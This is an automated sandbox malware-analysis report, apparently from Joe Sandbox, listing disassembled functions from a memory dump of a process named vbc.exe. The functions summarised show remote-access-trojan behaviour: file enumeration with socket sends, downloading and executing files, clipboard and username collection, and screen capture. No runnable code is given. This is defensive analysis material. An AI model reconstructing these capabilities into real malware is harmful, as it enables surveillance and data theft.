                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID: SETTINGS
                    • API String ID: 3473537107-594951305
                    • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                    • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                    • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                    • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                    APIs
                    • __EH_prolog.LIBCMT ref: 0040966A
                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstH_prologNext
                    • String ID:
                    • API String ID: 1157919129-0
                    • Opcode ID: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                    • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                    • Opcode Fuzzy Hash: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                    • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                    APIs
                    • __EH_prolog.LIBCMT ref: 00408811
                    • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                    • String ID:
                    • API String ID: 1771804793-0
                    • Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                    • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                    • Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                    • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: DownloadExecuteFileShell
                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe$open
                    • API String ID: 2825088817-757541357
                    • Opcode ID: 8341db3bc302fba65028eb5830d70bd40add62ae0f2dccab7f4c30313c030271
                    • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                    • Opcode Fuzzy Hash: 8341db3bc302fba65028eb5830d70bd40add62ae0f2dccab7f4c30313c030271
                    • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFind$FirstNextsend
                    • String ID: XPG$XPG
                    • API String ID: 4113138495-1962359302
                    • Opcode ID: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                    • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                    • Opcode Fuzzy Hash: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                    • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                    APIs
                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                      • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                      • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                      • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateInfoParametersSystemValue
                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                    • API String ID: 4127273184-3576401099
                    • Opcode ID: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                    • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                    • Opcode Fuzzy Hash: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                    • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: PkGNG
                    • API String ID: 0-263838557
                    • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                    • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                    • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                    • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorInfoLastLocale$_free$_abort
                    • String ID:
                    • API String ID: 2829624132-0
                    • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                    • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                    • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                    • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                    • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                    • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                    • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                    APIs
                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004334BF,00000034,?,?,00000000), ref: 00433849
                    • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?), ref: 0043385F
                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?,0041E251), ref: 00433871
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Crypt$Context$AcquireRandomRelease
                    • String ID:
                    • API String ID: 1815803762-0
                    • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                    • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                    • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                    • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                    APIs
                    • OpenClipboard.USER32(00000000), ref: 0040B711
                    • GetClipboardData.USER32(0000000D), ref: 0040B71D
                    • CloseClipboard.USER32 ref: 0040B725
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Clipboard$CloseDataOpen
                    • String ID:
                    • API String ID: 2058664381-0
                    • Opcode ID: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                    • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                    • Opcode Fuzzy Hash: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                    • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor
                    • String ID:
                    • API String ID: 2325560087-3916222277
                    • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                    • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                    • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                    • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .
                    • API String ID: 0-248832578
                    • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                    • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                    • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                    • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID: lJD
                    • API String ID: 1084509184-3316369744
                    • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                    • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                    • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                    • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID: lJD
                    • API String ID: 1084509184-3316369744
                    • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                    • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                    • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                    • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID: GetLocaleInfoEx
                    • API String ID: 2299586839-2904428671
                    • Opcode ID: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                    • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                    • Opcode Fuzzy Hash: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                    • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                    • HeapFree.KERNEL32(00000000), ref: 004120EE
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$FreeProcess
                    • String ID:
                    • API String ID: 3859560861-0
                    • Opcode ID: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                    • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                    • Opcode Fuzzy Hash: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                    • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$InfoLocale_abort
                    • String ID:
                    • API String ID: 1663032902-0
                    • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                    • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                    • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                    • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$InfoLocale_abort_free
                    • String ID:
                    • API String ID: 2692324296-0
                    • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                    • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                    • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                    • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                    APIs
                    • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                    • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                    • Opcode Fuzzy Hash: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                    • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                    APIs
                      • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(?,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                    • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalEnterEnumLocalesSectionSystem
                    • String ID:
                    • API String ID: 1272433827-0
                    • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                    • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                    • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                    • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID:
                    • API String ID: 1084509184-0
                    • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                    • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                    • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                    • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                    APIs
                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.0.0 Pro), ref: 0040F8E5
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID:
                    • API String ID: 2299586839-0
                    • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                    • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                    • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                    • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                    • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                    • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                    • Instruction Fuzzy Hash:
                    APIs
                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                    • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                      • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                    • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                    • DeleteDC.GDI32(00000000), ref: 00418F2A
                    • DeleteDC.GDI32(00000000), ref: 00418F2D
                    • DeleteObject.GDI32(00000000), ref: 00418F30
                    • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                    • DeleteDC.GDI32(00000000), ref: 00418F62
                    • DeleteDC.GDI32(00000000), ref: 00418F65
                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                    • GetIconInfo.USER32(?,?), ref: 00418FBD
                    • DeleteObject.GDI32(?), ref: 00418FEC
                    • DeleteObject.GDI32(?), ref: 00418FF9
                    • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                    • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                    • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                    • DeleteDC.GDI32(?), ref: 0041917C
                    • DeleteDC.GDI32(00000000), ref: 0041917F
                    • DeleteObject.GDI32(00000000), ref: 00419182
                    • GlobalFree.KERNEL32(?), ref: 0041918D
                    • DeleteObject.GDI32(00000000), ref: 00419241
                    • GlobalFree.KERNEL32(?), ref: 00419248
                    • DeleteDC.GDI32(?), ref: 00419258
                    • DeleteDC.GDI32(00000000), ref: 00419263
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
